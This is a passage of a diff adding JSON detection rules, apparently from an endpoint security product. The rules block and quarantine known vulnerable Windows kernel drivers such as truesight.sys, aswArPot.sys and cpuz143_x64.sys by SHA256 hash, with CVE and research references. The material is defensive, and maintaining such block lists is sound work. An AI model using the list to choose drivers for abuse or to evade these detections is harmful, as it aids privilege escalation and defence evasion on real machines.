+ "last_update": "2026-03-23T11:45:30.822962Z",
+ "creation_date": "2026-03-23T11:45:30.822964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ff73944c43821b3d13abc37245c2c8d4eadc876dead02da45ea82fdf1525973",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31c23698-4a97-5fd5-9c49-a8dea25e2ca1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830018Z",
+ "creation_date": "2026-03-23T11:45:30.830020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7b8383b044fac9f63b370428af5ed68d086beb5e719a4b49edf649e1851a5e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31ce8641-4ae3-5589-b66b-44e87923e33d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621212Z",
+ "creation_date": "2026-03-23T11:45:29.621214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0cb07a0624ddfacaa882af49e3783ae02c9fbd0ab232541a05a95b4a8abd8ef",
+ "comment": "Logitech CoreTemp vulnerable driver (aka LgCoreTemp.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31cec43b-640a-5965-b3de-a3e27dd53d21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828095Z",
+ "creation_date": "2026-03-23T11:45:31.828097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dfb0deecf8d39956ecff812406e2e079802f2a2c6e853003c6d1aeed3ffbd7d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31d07748-4b95-5d89-b86b-33b7c128d5bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824385Z",
+ "creation_date": "2026-03-23T11:45:30.824388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3629ce7fbcc691e1cf0c5e5f0bf5d964820107d7b860959b57afd17a712434c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31d9e85e-6d25-50f1-a101-a21a59a090f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615308Z",
+ "creation_date": "2026-03-23T11:45:29.615309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "051dad67cc6cb6b6e20b1230b04c09cc360d106a6b7000e0991381356ace0811",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31da887a-c015-5827-bc0d-6d5cbbfd2ba7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473388Z",
+ "creation_date": "2026-03-23T11:45:31.473391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "409704c58dbfcf148730855ed3e5a179da5a9d7b5669391716d5b18996bed5d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31de84e3-4855-5380-b1f1-6e5c2a3cba17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828565Z",
+ "creation_date": "2026-03-23T11:45:31.828567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "548780fd48a92c2fbf94f5d8447c4d76899f9ac0fe3b2fd4b8b427635447e085",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31f38467-db65-58a0-a9de-080846169752",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815858Z",
+ "creation_date": "2026-03-23T11:45:30.815860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f36bc2327a34da59c59e3fd4cb920a26f2db1c6a5f8eb17b00dc6e2a4ff71dc",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31faf7e5-7661-549b-9526-f2d749b2a9b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825059Z",
+ "creation_date": "2026-03-23T11:45:31.825061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c579a5786dae365555d6ef083910fbfc463926e52e9f3ae7ae028d615e6cffb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "320ae59a-5b1b-57a4-a353-cd7b7fa189ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498739Z",
+ "creation_date": "2026-03-23T11:45:31.498743Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da969d5b6b470c7758b28c8db88d17d56d837807119b45d66c088d5698189cf4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "320b5d99-f3e9-5e6a-869f-fe887bd7421f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811098Z",
+ "creation_date": "2026-03-23T11:45:31.811100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37744ed595d1f5c5f28e0745adabc10a93e47ca64b906dacc4be078424916eb5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "320f5bb5-1c8d-5771-907a-3e2aab4315fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978440Z",
+ "creation_date": "2026-03-23T11:45:29.978442Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9661dd0dcf81d2ee8e5eb3b728c907b4eb861806971051ad772f7fe4d09eb6a",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3224ad16-d7c4-5b12-84a3-3fe1c2d242b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814313Z",
+ "creation_date": "2026-03-23T11:45:31.814316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f42044d54e2820ce7866db56f42a45635da0fc54c9456db9cbbafb308c7f9bf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "323d34f1-9f87-55ab-9322-36298805c89b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610917Z",
+ "creation_date": "2026-03-23T11:45:29.610919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "472e29b63e1d9d44269a99962b186113586fbd3603eac3a23c520c7ef73a69cf",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3244793e-fe60-5259-9a8a-09e9eef04ad7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977150Z",
+ "creation_date": "2026-03-23T11:45:29.977153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fac3fab8ea2137a7e81a26de121187bf72e7d16ffa3e9aec3886e2376d3c718",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3257f270-aab5-5d7f-8cd8-11748d7451ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154390Z",
+ "creation_date": "2026-03-23T11:45:31.154393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1c5f026c62d6cd2eaf8c51a73a095ed616f3e6f81ff9c638b64605ffa06aa0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "32583d84-bde4-55de-9e6d-63bad41c5f3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969041Z",
+ "creation_date": "2026-03-23T11:45:29.969043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2e79f1e696f27fa70d72f97e448081b1fa14d59cbb89bb4a40428534dd5c6f6",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "325848d9-4087-510c-8c6f-11a0015460e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141433Z",
+ "creation_date": "2026-03-23T11:45:31.141435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f169884ed8138fc954cf5d098c146e1bffa89c6c2914cf3c4802ed8ccb4cc5b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "325ab51a-1c0d-55ff-a8d7-fc45d2b5ed82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830313Z",
+ "creation_date": "2026-03-23T11:45:30.830315Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830321Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d110cbdb130768e322689a1c9c54b74663d9358305ccb3760a4d27bf9b145c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "325f410f-54ff-584d-bd11-b75a7a1a1bc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984087Z",
+ "creation_date": "2026-03-23T11:45:29.984089Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984095Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9994990c02c37472625cc7b2255044feef9b73c08ca3a70c06861b7d26b27a25",
+ "comment": "Vulnerable Kernel Driver (aka VProEventMonitor.sys) [https://www.loldrivers.io/drivers/4db827b1-325b-444d-9f23-171285a4d12f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3265ec66-f8aa-5c11-a7f8-c0f7ade87bed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143510Z",
+ "creation_date": "2026-03-23T11:45:31.143512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "648244095ea6a94a53be19cbf539948ef067ff38a99234f309b2f71a4ebcb630",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "326a8b14-0d61-5507-bd91-1aa17b33a16c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490280Z",
+ "creation_date": "2026-03-23T11:45:31.490282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
